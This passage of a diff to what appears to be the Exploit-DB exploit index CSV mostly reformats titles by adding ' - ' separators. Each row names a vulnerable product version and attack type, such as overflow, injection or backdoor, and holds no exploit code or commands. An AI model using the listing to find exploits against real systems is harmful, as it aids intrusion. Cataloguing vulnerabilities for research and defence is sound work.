Vulnerabilities",2002-06-06,"Ulf Harnhammar",php,webapps,0 -21518,platforms/linux/dos/21518.txt,"X Window 4.0/4.1/4.2 System Oversized Font DoS",2002-06-10,"Tom Vogt",linux,dos,0 +21518,platforms/linux/dos/21518.txt,"X Window 4.0/4.1/4.2 - System Oversized Font DoS",2002-06-10,"Tom Vogt",linux,dos,0 21519,platforms/php/webapps/21519.txt,"MyHelpDesk 20020509 - HTML Injection",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 21520,platforms/linux/remote/21520.py,"QNX 6.5.0 / QCONN 1.4.207944 - Remote Command Execution",2012-09-25,Mor!p3r,linux,remote,0 21523,platforms/hardware/dos/21523.txt,"Cisco DPC2100 - Denial of Service",2012-09-26,"Daniel Smith",hardware,dos,0 @@ -18808,25 +18804,25 @@ id,file,description,date,author,platform,type,port 21529,platforms/php/webapps/21529.txt,"W-Agora 4.1.x - Remote File Inclusion",2002-06-10,frog,php,webapps,0 21530,platforms/windows/remote/21530.txt,"Seanox DevWex Windows Binary 1.2002.520 - File Disclosure",2002-06-08,"Kistler Ueli",windows,remote,0 21531,platforms/unix/dos/21531.txt,"Caldera OpenServer 5.0.x - XSCO Color Database File Heap Overflow",2002-06-11,kf,unix,dos,0 -21532,platforms/cgi/webapps/21532.txt,"CGIScript.net csNews 1.0 Double URL Encoding Unauthorized Administrative Access",2002-06-11,"Steve Gustin",cgi,webapps,0 -21533,platforms/cgi/webapps/21533.txt,"CGIScript.net csNews 1.0 Header File Type Restriction Bypass",2002-06-11,"Steve Gustin",cgi,webapps,0 +21532,platforms/cgi/webapps/21532.txt,"CGIScript.net csNews 1.0 - Double URL Encoding Unauthorized Administrative Access",2002-06-11,"Steve Gustin",cgi,webapps,0 +21533,platforms/cgi/webapps/21533.txt,"CGIScript.net csNews 1.0 - Header File Type Restriction Bypass",2002-06-11,"Steve Gustin",cgi,webapps,0 21534,platforms/linux/dos/21534.jsp,"Apache Tomcat 3/4 - JSP Engine Denial of Service",2002-06-12,"Marc Schoenefeld",linux,dos,0 21535,platforms/cgi/webapps/21535.txt,"MakeBook 2.2 - Form Field Input Validation",2002-06-12,b0iler,cgi,webapps,0 -21536,platforms/windows/dos/21536.jsp,"Macromedia JRun 3/4 JSP Engine Denial of Service",2002-06-12,"Marc Schoenefeld",windows,dos,0 -21537,platforms/linux/dos/21537.c,"Ayman Akt IRCIT 0.3.1 Invite Message Remote Buffer Overflow",2002-06-12,gobbles,linux,dos,0 -21538,platforms/linux/local/21538.c,"Richard Gooch SimpleInit 2.0.2 Open File Descriptor",2002-06-12,"Patrick Smith",linux,local,0 +21536,platforms/windows/dos/21536.jsp,"Macromedia JRun 3/4 JSP Engine - Denial of Service",2002-06-12,"Marc Schoenefeld",windows,dos,0 +21537,platforms/linux/dos/21537.c,"Ayman Akt IRCIT 0.3.1 - Invite Message Remote Buffer Overflow",2002-06-12,gobbles,linux,dos,0 +21538,platforms/linux/local/21538.c,"Richard Gooch SimpleInit 2.0.2 - Open File Descriptor",2002-06-12,"Patrick Smith",linux,local,0 21539,platforms/multiple/dos/21539.c,"Netscape 4.x/6.x / Mozilla 0.9.x - Malformed Email POP3 Denial of Service",2002-06-12,eldre8,multiple,dos,0 21540,platforms/windows/dos/21540.txt,"Microsoft SQL Server 2000 - SQLXML Buffer Overflow",2002-06-12,"Matt Moore",windows,dos,0 21541,platforms/windows/remote/21541.txt,"Microsoft SQL Server 2000 - SQLXML Script Injection",2002-06-12,"Matt Moore",windows,remote,0 -21542,platforms/windows/remote/21542.c,"AnalogX SimpleServer:WWW 1.16 Web Server Buffer Overflow",2002-06-13,"Auriemma Luigi",windows,remote,0 +21542,platforms/windows/remote/21542.c,"AnalogX SimpleServer:WWW 1.16 - Web Server Buffer Overflow",2002-06-13,"Auriemma Luigi",windows,remote,0 21543,platforms/java/webapps/21543.txt,"Ruslan Communications Builder - SQL Injection",2002-06-13,"Alexander Korchagin",java,webapps,0 21544,platforms/multiple/dos/21544.html,"Netscape 4.77 Composer Font Face Field Buffer Overflow",2002-06-13,S[h]iff,multiple,dos,0 -21545,platforms/jsp/webapps/21545.txt,"JAMF Casper Suite MDM CSRF",2012-09-27,"Jacob Holcomb",jsp,webapps,0 -21546,platforms/windows/webapps/21546.py,"Trend Micro Control Manager 5.5/6.0 AdHocQuery - Blind SQL Injection (post-auth)",2012-09-27,otoy,windows,webapps,0 +21545,platforms/jsp/webapps/21545.txt,"JAMF Casper Suite MDM - CSRF",2012-09-27,"Jacob Holcomb",jsp,webapps,0 +21546,platforms/windows/webapps/21546.py,"Trend Micro Control Manager 5.5/6.0 AdHocQuery - Post-Auth Blind SQL Injection",2012-09-27,otoy,windows,webapps,0 21547,platforms/windows/local/21547.txt,"Smartfren Connex EC 1261-2 UI OUC - Local Privilege Escalation",2012-09-27,X-Cisadane,windows,local,0 21548,platforms/cfm/remote/21548.txt,"ColdFusion MX - Missing Template Cross-Site Scripting",2002-06-13,Macromedia,cfm,remote,0 21549,platforms/windows/local/21549.txt,"Microsoft SQL Server 2000 - Password Encrypt Procedure Buffer Overflow",2002-06-14,"Martin Rakhmanoff",windows,local,0 -21550,platforms/windows/local/21550.txt,"Lumigent Log Explorer XP_LogAttach_StartProf Buffer Overflow",2002-06-14,"Martin Rakhmanoff",windows,local,0 +21550,platforms/windows/local/21550.txt,"Lumigent Log Explorer XP - _LogAttach_StartProf Buffer Overflow",2002-06-14,"Martin Rakhmanoff",windows,local,0 21551,platforms/windows/local/21551.txt,"Lumigent Log Explorer 3.0.1 XP_LogAttach_SetPort Buffer Overflow",2002-06-14,"Martin Rakhmanoff",windows,local,0 21552,platforms/php/webapps/21552.txt,"PHP Classifieds 6.0.5 - Cross-Site Scripting",2002-06-14,windows-1256,php,webapps,0 21553,platforms/cgi/webapps/21553.txt,"Mewsoft NetAuction 3.0 - Cross-Site Scripting",2002-06-14,windows-1256,cgi,webapps,0 @@ -18848,7 +18844,7 @@ id,file,description,date,author,platform,type,port 21569,platforms/windows/dos/21569.txt,"Microsoft SQL Server 2000 / Microsoft Jet 4.0 Engine - Unicode Buffer Overflow",2002-06-19,NGSSoftware,windows,dos,0 21570,platforms/php/webapps/21570.txt,"BasiliX Webmail 1.1 - Message Content Script Injection",2002-06-19,"Ulf Harnhammar",php,webapps,0 21571,platforms/irix/remote/21571.c,"SGI IRIX 6.x - rpc.xfsmd Remote Command Execution",2002-06-20,"Last Stage of Delirium",irix,remote,0 -21572,platforms/multiple/dos/21572.txt,"Half-Life Server 1.1/3.1 New Player Flood Denial of Service",2002-06-20,"Auriemma Luigi",multiple,dos,0 +21572,platforms/multiple/dos/21572.txt,"Half-Life Server 1.1/3.1 - New Player Flood Denial of Service",2002-06-20,"Auriemma Luigi",multiple,dos,0 21573,platforms/cgi/webapps/21573.txt,"YaBB 1 - Invalid Topic Error Page Cross-Site Scripting",2002-06-21,methodic,cgi,webapps,0 21574,platforms/unix/remote/21574.txt,"Pirch IRC 98 Client - Malformed Link Buffer Overrun",2002-06-21,"David Rude II",unix,remote,0 21575,platforms/multiple/dos/21575.txt,"Mod_SSL 2.8.x - Off-By-One HTAccess Buffer Overflow",2002-06-22,"Frank DENIS",multiple,dos,0 @@ -18856,7 +18852,7 @@ id,file,description,date,author,platform,type,port 21577,platforms/hp-ux/local/21577.c,"HP CIFS/9000 Server A.01.05/A.01.06 - Buffer Overflow",2002-11-06,watercloud,hp-ux,local,0 21578,platforms/unix/remote/21578.txt,"OpenSSH 3.x - Challenge-Response Buffer Overflow (1)",2002-06-24,"Christophe Devine",unix,remote,0 21579,platforms/unix/remote/21579.txt,"OpenSSH 3.x - Challenge-Response Buffer Overflow (2)",2002-06-24,"Gobbles Security",unix,remote,0 -21580,platforms/linux/dos/21580.txt,"Inktomi Traffic Server 4/5 Traffic_Manager Path Argument Buffer Overflow",2002-06-25,"Juliano Rizzo",linux,dos,0 +21580,platforms/linux/dos/21580.txt,"Inktomi Traffic Server 4/5 - Traffic_Manager Path Argument Buffer Overflow",2002-06-25,"Juliano Rizzo",linux,dos,0 21581,platforms/windows/remote/21581.txt,"Summit Computer Networks Lil' HTTP Server 2 - URLCount.CGI HTML Injection",2002-06-27,"Matthew Murphy",windows,remote,0 21582,platforms/windows/remote/21582.txt,"Macromedia JRun 3/4 - Administrative Authentication Bypass",2002-06-28,"Matt Moore",windows,remote,0 21583,platforms/linux/local/21583.pl,"Mandrake 7/8/9 / RedHat 6.x/7 Bonobo EFSTool - Commandline Argument Buffer Overflow (1)",2002-06-29,clorox,linux,local,0 @@ -18867,8 +18863,8 @@ id,file,description,date,author,platform,type,port 21588,platforms/cgi/webapps/21588.txt,"Blackboard 5.0 - Cross-Site Scripting",2002-07-01,"Berend-Jan Wever",cgi,webapps,0 21589,platforms/windows/remote/21589.pl,"AnalogX Proxy 4.0 - Socks4A Buffer Overflow",2002-07-01,Kanatoko,windows,remote,0 21590,platforms/php/webapps/21590.txt,"PHPAuction 1/2 - Unauthorized Administrative Access",2002-07-02,ethx,php,webapps,0 -21591,platforms/windows/remote/21591.sh,"ArGoSoft 1.8 Mail Server Directory Traversal",2002-07-06,"team n.finity",windows,remote,0 -21592,platforms/unix/local/21592.c,"Sun SunPCi II VNC Software 2.3 Password Disclosure",2002-07-03,"Richard van den Berg",unix,local,0 +21591,platforms/windows/remote/21591.sh,"ArGoSoft 1.8 Mail Server - Directory Traversal",2002-07-06,"team n.finity",windows,remote,0 +21592,platforms/unix/local/21592.c,"Sun SunPCi II VNC Software 2.3 - Password Disclosure",2002-07-03,"Richard van den Berg",unix,local,0 21593,platforms/multiple/dos/21593.txt,"Epic Games Unreal Tournament Server 436.0 - DoS Amplifier",2002-07-03,"Auriemma Luigi",multiple,dos,0 21594,platforms/windows/dos/21594.pl,"WorldSpan Res Manager 4.1 - Malformed TCP Packet Denial of Service",2002-07-04,altomo,windows,dos,0 21595,platforms/windows/remote/21595.c,"Nullsoft Winamp 2.80 - Automatic Update Check Buffer Overflow",2002-07-03,anonymous,windows,remote,0 @@ -18893,24 +18889,24 @@ id,file,description,date,author,platform,type,port 21614,platforms/freebsd/remote/21614.c,"ATPhttpd 0.4 b - Buffer Overflow",2002-07-12,badc0ded,freebsd,remote,0 21615,platforms/windows/remote/21615.c,"Real Networks RealJukebox 1.0.2/RealOne 6.0.10 Player Gold - Skinfile Buffer Overflow",2002-07-12,UNYUN,windows,remote,0 21616,platforms/windows/remote/21616.txt,"Working Resources 1.7.3 BadBlue - Null Byte File Disclosure",2002-06-13,"Matthew Murphy",windows,remote,0 -21617,platforms/cgi/webapps/21617.txt,"IMHO Webmail 0.9x Account Hijacking",2002-07-15,"Security Bugware",cgi,webapps,0 -21618,platforms/windows/remote/21618.txt,"Mirabilis ICQ 2002 Sound Scheme Remote Configuration Modification",2002-07-15,xLaNT,windows,remote,0 +21617,platforms/cgi/webapps/21617.txt,"IMHO Webmail 0.9x - Account Hijacking",2002-07-15,"Security Bugware",cgi,webapps,0 +21618,platforms/windows/remote/21618.txt,"Mirabilis ICQ 2002 - Sound Scheme Remote Configuration Modification",2002-07-15,xLaNT,windows,remote,0 21619,platforms/windows/remote/21619.txt,"AOL Instant Messenger 4.x - Unauthorized Actions",2002-07-16,orb,windows,remote,0 21620,platforms/cgi/dos/21620.txt,"Oddsock Song Requester 2.1 - WinAmp Plugin Denial of Service",2002-07-16,"Lucas Lundgren",cgi,dos,0 21621,platforms/jsp/webapps/21621.txt,"Macromedia Sitespring 1.2 - Default Error Page Cross-Site Scripting",2002-07-17,"Peter Gründl",jsp,webapps,0 21622,platforms/php/webapps/21622.txt,"PHP-Wiki 1.2/1.3 - Cross-Site Scripting",2002-07-17,Pistone,php,webapps,0 21623,platforms/linux/local/21623.txt,"Python 1.5.2 Pickle - Unsafe eval() Code Execution",2002-07-17,"Jeff Epler",linux,local,0 21624,platforms/linux/local/21624.py,"Python 1.5/1.6/2.0/2.1.x - Pickle Class Constructor Arbitrary Code Execution",2002-07-17,"Jeff Epler",linux,local,0 -21625,platforms/windows/remote/21625.pl,"Trend Micro InterScan VirusWall for Windows NT 3.52 Space Gap Scan Bypass",2002-07-18,SecuriTeam,windows,remote,0 +21625,platforms/windows/remote/21625.pl,"Trend Micro InterScan VirusWall for Windows NT 3.52 - Space Gap Scan Bypass",2002-07-18,SecuriTeam,windows,remote,0 21626,platforms/windows/remote/21626.c,"3.3/4.0/4.2 MERCUR Mailserver - Control-Service Buffer Overflow",2002-07-16,anonymous,windows,remote,0 22072,platforms/linux/remote/22072.c,"Cobalt RaQ4 - Administrative Interface Command Execution",2002-12-05,grazer,linux,remote,0 -21627,platforms/multiple/remote/21627.txt,"Oracle Reports Server 6.0.8/9.0.2 Information Disclosure",2002-07-18,skp,multiple,remote,0 +21627,platforms/multiple/remote/21627.txt,"Oracle Reports Server 6.0.8/9.0.2 - Information Disclosure",2002-07-18,skp,multiple,remote,0 21628,platforms/php/webapps/21628.txt,"Geeklog 1.3.5 - HTML Attribute Cross-Site Scripting",2002-07-19,"Ulf Harnhammar",php,webapps,0 21629,platforms/windows/local/21629.txt,"Adobe eBook Reader 2.2 - File Restoration Privilege Escalation",2002-07-19,"Vladimir Katalov",windows,local,0 21630,platforms/windows/remote/21630.html,"Working Resources 1.7.x BadBlue - Administrative Interface Arbitrary File Access",2002-07-20,"Matthew Murphy",windows,remote,0 21631,platforms/windows/remote/21631.txt,"Microsoft Outlook Express 5/6 - Spoofable File Extensions",2002-07-20,"Matthew Murphy",windows,remote,0 -21632,platforms/unix/dos/21632.c,"PHP Interpreter 3.0.x/4.0.x/4.1/4.2 Direct Invocation Denial of Service",2002-07-22,"Matthew Murphy",unix,dos,0 -21633,platforms/windows/remote/21633.c,"SmartMax MailMax 4.8 Popmax Buffer Overflow",2002-07-20,anonymous,windows,remote,0 +21632,platforms/unix/dos/21632.c,"PHP Interpreter 3.0.x/4.0.x/4.1/4.2 - Direct Invocation Denial of Service",2002-07-22,"Matthew Murphy",unix,dos,0 +21633,platforms/windows/remote/21633.c,"SmartMax MailMax 4.8 - Popmax Buffer Overflow",2002-07-20,anonymous,windows,remote,0 21634,platforms/windows/dos/21634.c,"SecureCRT 2.4/3.x/4.0 - SSH1 Identifier String Buffer Overflow (1)",2002-07-23,Kyuzo,windows,dos,0 21635,platforms/windows/remote/21635.c,"SecureCRT 2.4/3.x/4.0 - SSH1 Identifier String Buffer Overflow (2)",2002-07-23,"andrea lisci",windows,remote,0 21636,platforms/windows/remote/21636.txt,"Opera 6.0.1 / Microsoft Internet Explorer 5/6 - JavaScript Modifier Keypress Event Subversion",2002-07-23,"Andreas Sandblad",windows,remote,0 @@ -18920,19 +18916,19 @@ id,file,description,date,author,platform,type,port 21640,platforms/php/webapps/21640.txt,"Cobalt Qube 3.0 - Authentication Bypass",2002-07-24,pokley,php,webapps,0 21641,platforms/cgi/remote/21641.txt,"GNU Mailman 2.0.x - Subscribe Cross-Site Scripting",2002-07-24,office,cgi,remote,0 21642,platforms/cgi/remote/21642.txt,"GNU Mailman 2.0.x - Admin Login Variant Cross-Site Scripting",2002-07-24,office,cgi,remote,0 -21643,platforms/windows/remote/21643.c,"CodeBlue 5.1 SMTP Response Buffer Overflow",2002-07-24,doe,windows,remote,0 +21643,platforms/windows/remote/21643.c,"CodeBlue 5.1 - SMTP Response Buffer Overflow",2002-07-24,doe,windows,remote,0 21644,platforms/unix/dos/21644.txt,"Pine 4.x - Empty MIME Boundary Denial of Service",2002-07-24,"Martin J. Muench",unix,dos,0 21645,platforms/windows/dos/21645.txt,"Foxit Reader 5.4.3.0920 - Crash PoC",2012-10-01,coolkaveh,windows,dos,0 21646,platforms/php/webapps/21646.py,"Archin WordPress Theme 3.2 - Unauthenticated Configuration Access",2012-10-01,bwall,php,webapps,0 -21648,platforms/windows/remote/21648.txt,"Pegasus Mail 4.0 1 Message Header Buffer Overflow",2002-07-24,"Auriemma Luigi",windows,remote,0 -21649,platforms/multiple/remote/21649.txt,"CacheFlow CacheOS 3.1.x/4.0.x/4.1 Unresolved Domain Cross-Site Scripting",2002-07-24,T.Suzuki,multiple,remote,0 +21648,platforms/windows/remote/21648.txt,"Pegasus Mail 4.0 1 - Message Header Buffer Overflow",2002-07-24,"Auriemma Luigi",windows,remote,0 +21649,platforms/multiple/remote/21649.txt,"CacheFlow CacheOS 3.1.x/4.0.x/4.1 - Unresolved Domain Cross-Site Scripting",2002-07-24,T.Suzuki,multiple,remote,0 21651,platforms/windows/remote/21651.txt,"Microsoft SQL Server 2000 - sp_MScopyscript SQL Injection",2002-07-25,"Cesar Cerrudo",windows,remote,0 21652,platforms/windows/remote/21652.cpp,"Microsoft SQL Server 2000 - Resolution Service Heap Overflow",2002-07-25,"David Litchfield",windows,remote,0 21653,platforms/windows/dos/21653.c,"KaZaA Media Desktop 1.7.1 - Large Message Denial of Service",2002-07-25,"Josh and omega",windows,dos,0 -21654,platforms/windows/remote/21654.c,"IPSwitch IMail 6.x/7.0/7.1 Web Messaging HTTP Get Buffer Overflow",2002-07-25,anonymous,windows,remote,0 +21654,platforms/windows/remote/21654.c,"IPSwitch IMail 6.x/7.0/7.1 - Web Messaging HTTP Get Buffer Overflow",2002-07-25,anonymous,windows,remote,0 21655,platforms/hardware/dos/21655.c,"Cisco IOS 11.x - TFTP Server Long File Name Buffer Overflow",2002-07-26,FX,hardware,dos,0 -21656,platforms/hardware/dos/21656.txt,"Lucent Access Point 300/600/1500 IP Services Router Long HTTP Request DoS",2002-07-27,FX,hardware,dos,0 -21657,platforms/hardware/dos/21657.txt,"HP ProCurve Switch 4000M SNMP Write Denial of Service",2002-07-27,FX,hardware,dos,0 +21656,platforms/hardware/dos/21656.txt,"Lucent Access Point 300/600/1500 IP Services Router - Long HTTP Request DoS",2002-07-27,FX,hardware,dos,0 +21657,platforms/hardware/dos/21657.txt,"HP ProCurve Switch 4000M - SNMP Write Denial of Service",2002-07-27,FX,hardware,dos,0 21658,platforms/cgi/webapps/21658.html,"Ben Chivers Easy Homepage Creator 1.0 - File Modification",2002-07-29,"Arek Suroboyo",cgi,webapps,0 21659,platforms/cgi/webapps/21659.html,"Ben Chivers Easy Guestbook 1.0 - Administrative Access",2002-07-29,"Arek Suroboyo",cgi,webapps,0 21660,platforms/php/webapps/21660.txt,"phpBB2 Gender Mod 1.1.3 - SQL Injection",2002-07-29,"langtuhaohoa caothuvolam",php,webapps,0 @@ -18956,7 +18952,7 @@ id,file,description,date,author,platform,type,port 21679,platforms/cgi/webapps/21679.txt,"Dispair 0.1/0.2 - Remote Command Execution",2002-07-30,anonymous,cgi,webapps,0 21680,platforms/windows/remote/21680.pl,"Qualcomm Eudora 5 - MIME Multipart Boundary Buffer Overflow",2002-08-05,Kanatoko,windows,remote,0 21681,platforms/windows/remote/21681.html,"Opera 6.0.x - FTP View Cross-Site Scripting",2002-08-06,"Eiji James Yoshida",windows,remote,0 -21682,platforms/unix/remote/21682.txt,"Mozilla 1.0/1.1 FTP View Cross-Site Scripting",2002-08-06,"Eiji James Yoshida",unix,remote,0 +21682,platforms/unix/remote/21682.txt,"Mozilla 1.0/1.1 - FTP View Cross-Site Scripting",2002-08-06,"Eiji James Yoshida",unix,remote,0 21683,platforms/linux/local/21683.c,"qmailadmin 1.0.x - Local Buffer Overflow",2002-08-06,"Thomas Cannon",linux,local,0 21684,platforms/windows/local/21684.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (1)",2002-08-06,sectroyer,windows,local,0 21685,platforms/windows/local/21685.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (2)",2002-08-06,"Oliver Lavery",windows,local,0 @@ -18971,12 +18967,12 @@ id,file,description,date,author,platform,type,port 21694,platforms/windows/dos/21694.pl,"602Pro LAN SUITE 2002 - Telnet Proxy Localhost Denial of Service",2002-08-03,"Stan Bubrouski",windows,dos,0 21695,platforms/windows/remote/21695.pl,"Qualcomm Eudora 5/6 - File Attachment Spoofing (1)",2002-08-08,"Paul Szabo",windows,remote,0 21696,platforms/windows/remote/21696.pl,"Qualcomm Eudora 5/6 - File Attachment Spoofing (2)",2002-08-08,"Paul Szabo",windows,remote,0 -21697,platforms/windows/remote/21697.txt,"Apache 2.0 Encoded Backslash Directory Traversal",2002-08-09,"Auriemma Luigi",windows,remote,0 +21697,platforms/windows/remote/21697.txt,"Apache 2.0 - Encoded Backslash Directory Traversal",2002-08-09,"Auriemma Luigi",windows,remote,0 21698,platforms/windows/remote/21698.txt,"BlueFace Falcon Web Server 2.0 - Error Message Cross-Site Scripting",2002-08-09,"Matt Murphy",windows,remote,0 -21699,platforms/hardware/remote/21699.txt,"Orinoco OEM Residential Gateway SNMP Community String Remote Configuration",2002-08-09,"Foundstone Inc.",hardware,remote,0 +21699,platforms/hardware/remote/21699.txt,"Orinoco OEM Residential Gateway - SNMP Community String Remote Configuration",2002-08-09,"Foundstone Inc.",hardware,remote,0 21700,platforms/linux/local/21700.c,"ISDN4Linux 3.1 IPPPD Device String SysLog Format String (1)",2002-08-10,"Gobbles Security",linux,local,0 21701,platforms/linux/local/21701.pl,"ISDN4Linux 3.1 IPPPD Device String SysLog Format String (2)",2002-08-10,"TESO Security",linux,local,0 -21702,platforms/asp/webapps/21702.txt,"Midicart ASP Remote Customer Information Retrieval",2002-08-10,"Dimitri Sekhniashvili",asp,webapps,0 +21702,platforms/asp/webapps/21702.txt,"Midicart ASP - Remote Customer Information Retrieval",2002-08-10,"Dimitri Sekhniashvili",asp,webapps,0 21703,platforms/windows/dos/21703.txt,"Citrix Metaframe for Windows NT 4.0 TSE 1.8 - Java ICA Environment DoS",2002-08-11,"Tanin Ehrami",windows,dos,0 21704,platforms/unix/remote/21704.txt,"W3C CERN httpd 3.0 Proxy - Cross-Site Scripting",2002-08-12,"TAKAGI Hiromitsu",unix,remote,0 21705,platforms/windows/remote/21705.txt,"Microsoft Internet Explorer 6.0 - File Attachment Script Execution",2002-08-13,http-equiv,windows,remote,0 @@ -18984,7 +18980,7 @@ id,file,description,date,author,platform,type,port 21707,platforms/windows/remote/21707.txt,"GoAhead WebServer 2.1 - Remote Arbitrary Command Execution",2002-08-14,anonymous,windows,remote,0 21708,platforms/php/webapps/21708.txt,"Leszek Krupinski L-Forum 2.4 - Search Script SQL Injection",2002-08-14,"Matthew Murphy",php,webapps,0 21709,platforms/windows/remote/21709.pl,"MyWebServer 1.0.2 - Search Request Remote Buffer Overflow",2002-08-14,D4rkGr3y,windows,remote,0 -21710,platforms/windows/remote/21710.txt,"MyWebServer 1.0.2 Long HTTP Request HTML Injection",2002-08-14,D4rkGr3y,windows,remote,0 +21710,platforms/windows/remote/21710.txt,"MyWebServer 1.0.2 - Long HTTP Request HTML Injection",2002-08-14,D4rkGr3y,windows,remote,0 21711,platforms/windows/remote/21711.html,"Microsoft Outlook Express 5/6 - MHTML URL Handler File Rendering",2002-08-15,http-equiv,windows,remote,0 21712,platforms/windows/dos/21712.txt,"Google Toolbar 1.1.60 - Search Function Denial of Service",2002-08-15,onet,windows,dos,0 21713,platforms/windows/local/21713.py,"NCMedia Sound Editor Pro 7.5.1 - (SEH + DEP Bypass)",2012-10-03,b33f,windows,local,0 @@ -19001,7 +18997,7 @@ id,file,description,date,author,platform,type,port 21725,platforms/linux/remote/21725.c,"MySQL 3.20.32/3.22.x/3.23.x - Null Root Password Weak Default Configuration (1)",2002-08-19,g0thm0g,linux,remote,0 21726,platforms/linux/remote/21726.c,"MySQL 3.20.32/3.22.x/3.23.x - Null Root Password Weak Default Configuration (2)",2002-10-05,st0ic,linux,remote,0 21727,platforms/php/webapps/21727.txt,"Mantis 0.15.x/0.16/0.17.x - JPGraph Remote File Inclusion Command Execution",2002-08-19,"Joao Gouveia",php,webapps,0 -21728,platforms/cgi/webapps/21728.txt,"Kerio MailServer 5.0/5.1 Web Mail Multiple Cross-Site Scripting Vulnerabilities",2002-08-19,"Abraham Lincoln",cgi,webapps,0 +21728,platforms/cgi/webapps/21728.txt,"Kerio MailServer 5.0/5.1 Web Mail - Multiple Cross-Site Scripting Vulnerabilities",2002-08-19,"Abraham Lincoln",cgi,webapps,0 21729,platforms/cgi/webapps/21729.txt,"Mozilla Bonsai - Multiple Cross-Site Scripting Vulnerabilities",2002-08-20,"Stan Bubrouski",cgi,webapps,0 21730,platforms/cgi/webapps/21730.txt,"Mozilla Bonsai 1.3 - Path Disclosure",2002-08-20,"Stan Bubrouski",cgi,webapps,0 21731,platforms/novell/remote/21731.pl,"Novell NetWare 5.1/6.0 - HTTP Post Arbitrary Perl Code Execution",2002-08-20,"Dan Elder",novell,remote,0 @@ -19009,10 +19005,10 @@ id,file,description,date,author,platform,type,port 21733,platforms/linux/local/21733.sh,"Sun Cobalt RaQ 4.0 Predictable Temporary Filename Symbolic Link Attack",2002-06-28,"Charles Stevenson",linux,local,0 21734,platforms/unix/remote/21734.txt,"Apache Tomcat 4.1 - JSP Request Cross-Site Scripting",2002-08-21,Skinnay,unix,remote,0 21735,platforms/windows/remote/21735.txt,"Abyss Web Server 1.0 - Encoded Backslash Directory Traversal",2002-08-22,"Auriemma Luigi",windows,remote,0 -21736,platforms/hardware/dos/21736.txt,"LG LR3100p 1.30 Series Router IP Packet Flags Denial of Service",2002-08-22,"Lukasz Bromirski",hardware,dos,0 +21736,platforms/hardware/dos/21736.txt,"LG LR3100p 1.30 Series Router - IP Packet Flags Denial of Service",2002-08-22,"Lukasz Bromirski",hardware,dos,0 21737,platforms/windows/dos/21737.txt,"Cyme ChartFX Client Server - ActiveX Control Array Indexing",2012-10-04,"Francis Provencher",windows,dos,0 21834,platforms/php/webapps/21834.rb,"phpMyAdmin 3.5.2.2 - server_sync.php Backdoor",2012-10-10,Metasploit,php,webapps,0 -21739,platforms/windows/dos/21739.pl,"JPEGsnoop 1.5.2 WriteAV Crash PoC",2012-10-04,"Jean Pascal Pereira",windows,dos,0 +21739,platforms/windows/dos/21739.pl,"JPEGsnoop 1.5.2 - WriteAV Crash PoC",2012-10-04,"Jean Pascal Pereira",windows,dos,0 21740,platforms/php/webapps/21740.txt,"phpmychat plus 1.94 rc1 - Multiple Vulnerabilities",2012-10-04,L0n3ly-H34rT,php,webapps,0 21741,platforms/windows/dos/21741.txt,"XnView 1.99.1 - .JLS File Decompression Heap Overflow",2012-10-04,"Joseph Sheridan",windows,dos,0 21742,platforms/php/webapps/21742.txt,"template CMS 2.1.1 - Multiple Vulnerabilities",2012-10-04,"High-Tech Bridge SA",php,webapps,0 @@ -19025,14 +19021,14 @@ id,file,description,date,author,platform,type,port 21749,platforms/windows/remote/21749.txt,"Microsoft Internet Explorer 5/6 - XML Redirect File Disclosure",2002-08-23,"GreyMagic Software",windows,remote,0 21750,platforms/windows/remote/21750.txt,"Microsoft Internet Explorer 5 - Dialog Same Origin Policy Bypass Variant",2002-04-16,"GreyMagic Software",windows,remote,0 21751,platforms/multiple/remote/21751.txt,"Blazix 1.2 - Special Character Handling Server Side Script Information Disclosure",2002-08-24,"Auriemma Luigi",multiple,remote,0 -21752,platforms/multiple/remote/21752.txt,"Blazix 1.2 Password Protected Directory Information Disclosure",2002-08-25,"Auriemma Luigi",multiple,remote,0 +21752,platforms/multiple/remote/21752.txt,"Blazix 1.2 - Password Protected Directory Information Disclosure",2002-08-25,"Auriemma Luigi",multiple,remote,0 21753,platforms/windows/remote/21753.txt,"OmniHTTPd 1.1/2.0.x/2.4 - test.php Sample Application XSS",2002-08-26,"Matthew Murphy",windows,remote,0 -21754,platforms/windows/remote/21754.txt,"OmniHTTPd 1.1/2.0.x/2.4 test.shtml Sample Application XSS",2002-08-26,"Matthew Murphy",windows,remote,0 -21755,platforms/php/webapps/21755.txt,"PHPReactor 1.2.7 Style Attribute HTML Injection",2002-08-24,"Matthew Murphy",php,webapps,0 +21754,platforms/windows/remote/21754.txt,"OmniHTTPd 1.1/2.0.x/2.4 - test.shtml Sample Application XSS",2002-08-26,"Matthew Murphy",windows,remote,0 +21755,platforms/php/webapps/21755.txt,"PHPReactor 1.2.7 - Style Attribute HTML Injection",2002-08-24,"Matthew Murphy",php,webapps,0 21756,platforms/hardware/dos/21756.txt,"Belkin F5D6130 Wireless Network Access Point - SNMP Request Denial of Service",2002-08-26,wlanman,hardware,dos,0 21757,platforms/windows/remote/21757.txt,"OmniHTTPD 1.1/2.0.x/2.4 Sample Application URL Encoded Newline HTML Injection",2002-08-26,"Matthew Murphy",windows,remote,0 21758,platforms/unix/local/21758.txt,"Caldera X Server 7.1/8.0 - External Program Privileged Invocation Weakness",2002-08-27,"Olaf Kirch",unix,local,0 -21759,platforms/windows/remote/21759.txt,"mIRC 6.0 Scripting ASCTime Buffer Overflow",2002-08-27,"James Martin",windows,remote,0 +21759,platforms/windows/remote/21759.txt,"mIRC 6.0 - Scripting ASCTime Buffer Overflow",2002-08-27,"James Martin",windows,remote,0 21760,platforms/unix/local/21760.c,"GDAM123 0.933/0.942 - Filename Buffer Overflow",2002-08-24,"Netric Security",unix,local,0 21761,platforms/linux/local/21761.c,"Linuxconf 1.1.x / 1.2.x - Local Environment Variable Buffer Overflow (1)",2002-08-28,RaiSe,linux,local,0 21762,platforms/linux/local/21762.c,"Linuxconf 1.1.x / 1.2.x - Local Environment Variable Buffer Overflow (2)",2002-08-28,"David Endler",linux,local,0 @@ -19041,14 +19037,14 @@ id,file,description,date,author,platform,type,port 21765,platforms/linux/remote/21765.pl,"Webmin 0.x - RPC Function Privilege Escalation",2002-08-28,"Noam Rathaus",linux,remote,0 21766,platforms/asp/webapps/21766.txt,"FactoSystem Weblog 0.9/1.0/1.1 - Multiple SQL Injection",2002-08-31,"Matthew Murphy",asp,webapps,0 21767,platforms/multiple/remote/21767.txt,"NullLogic Null HTTPd 0.5 - Error Page Cross-Site 